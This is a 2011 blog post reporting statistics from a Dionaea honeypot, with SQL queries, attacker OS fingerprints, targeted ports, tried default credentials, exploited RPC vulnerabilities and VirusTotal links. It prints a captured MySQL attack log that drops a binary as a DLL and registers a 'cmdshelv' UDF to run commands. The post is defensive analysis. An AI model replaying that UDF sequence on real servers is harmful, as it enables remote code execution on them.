Sunday, October 9, 2011

Some stats of my dionaea honeypot

Last month, my PC was running Dionaea honeypot during two periods of some days. So I decided to share some statistics about the attacked services, localization of the attacker, OS of the attacker ...
I have also list SQL requests used to get these informations.


P0f informations

P0f is a passive OS fingerprinting tool which will analyze network traffic to get informations like operating system version, firewall presence, NAT use, distance to the remote host and also about the kind of link used.
FYI : You need to enable p0f in dionaea configuration file and run p0f tool in order to have these datas.

select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc; 

countOS
7509
104Windows 2000 SP4, XP SP1+
46Windows XP/2000 (RFC1323+, w+, tstamp-)
31Windows 2000 SP2+, XP SP1+ (seldom 98)
17Linux 2.6 (newer, 3)
11Linux 2.6 (newer, 2)
8Windows XP SP1+, 2000 SP3
7Linux 2.4-2.6
6Windows XP/2000 (RFC1323+, w, tstamp+)
3Windows 95
2SunOS 4.1.x
1Linux 2.6? (barebone, rare!)
1Windows 98 (no sack)


select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;


countlink
6051
1533ethernet/modem
101pppoe (DSL)
39IPv6/IPIP
10(Google/AOL)
5GPRS, T1, FreeS/WAN
3PIX, SMC, sometimes wireless
3sometimes DSL (2)
1vtun


Targeted local port

select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;

counttargeted port
120142
33580
123135
1131433
8732554
7232045
615060
383389
388008
3723
...
18445
...

Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.


Location of attackers / malware sources

select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;


If we look at the map, we can see lot of connections from France. But I can explain some of them, because when my honeypot was running, I have launched some ports scan. In order to have reliable statistics, I have removed of the sqlite database connections coming from my IP but I think I've omitted some of them.


Protocol informations

select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;

countconnection_transport
6959tcp
85udp
13tls


select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;

countconnection_protocol
3929pcap
1204mirrorc
1201mirrord
335httpd
123epmapper
113mssqld
70SipSession
54TftpClient
17smbd
7mysqld
4SipCall



Default passwords

select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;

countlogin_usernamelogin_passwordconnection_protocollocal_port
95samssqld1433
6rootmysqld3306


Malwares targeting my honeypot have tried to connect to MySQL with root/ and to Microsoft SQL Server with sa/ which are both default credentials.



MySQL requests

select * from mysql_command_args;

Look output of this request is quite fun :
drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');

For more informations, you can read this article : http://carnivore.it/2011/06/12/the_mysql_cmdshelv



RPC vulnerabilities

select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";

dcerpcservice_namedcerpcserviceop_namedcerpcserviceop_vuln
DCOMRemoteActivationMS03-26
DSSETUPDsRolerUpgradeDownlevelServerMS04-11
ISystemActivatorRemoteCreateInstanceMS04-12
MSMQQMCreateObjectInternalMS07-065
MSMQQMDeleteObjectMS05-017
NWWKSNwChangePasswordMS06-66
NWWKSNwOpenEnumNdsSubTreesMS06-66
PNPPNP_QueryResConfListMS05-39
SRVSVCNetPathCanonicalizeMS08-67
SRVSVCNetPathCompareMS08-67
WKSSVCNetAddAlternateComputerNameMS03-39
nddeapiNDdeSetTrustedShareWMS04-031



Malware URLs

select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;

All malwares have been downloaded on TFTP servers and are link to connections with port 135. As URLs are pointing to malwares, I won't show them here.



Virustotal reports

select virustotal_permalink from virustotals;

http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380

All these URLs are Virustotal report of malwares capturated by my honeypot. Most of them have been submitted to Virustotal this summer. According reports, they are all IRC bots. As detection rate is high (between 93% and 98%), they are not an important threat for our computer as long as user is not stupid.

1 comment:

  1. damn, i just found these in my mysql dir...
    -rw-rw-rw- 1 mysql mysql 32482 2012-06-06 19:09 \usr\lib\mysql\plugin\mmsql.dll
    -rw-rw-rw- 1 mysql mysql 164 2012-06-06 19:09 c:\docume~1\alluse~1\????ʼ???˵?\????\????\a.vbs
    -rw-rw-rw- 1 mysql mysql 196608 2012-06-07 20:01 C:\18181.exe
    -rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINDOWS\amd.dll
    -rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINT\amd.dll
    -rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINDOWS\SYSTEM32\amd.dll
    -rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\amd.dll
    -rw-rw-rw- 1 mysql mysql 63501 2012-07-19 06:07 C:\11188.exe

    ubuntu 12.04, admittedly not very secure.
    No evidence in bash_history or mysql_history.

    Any advice?

    ReplyDelete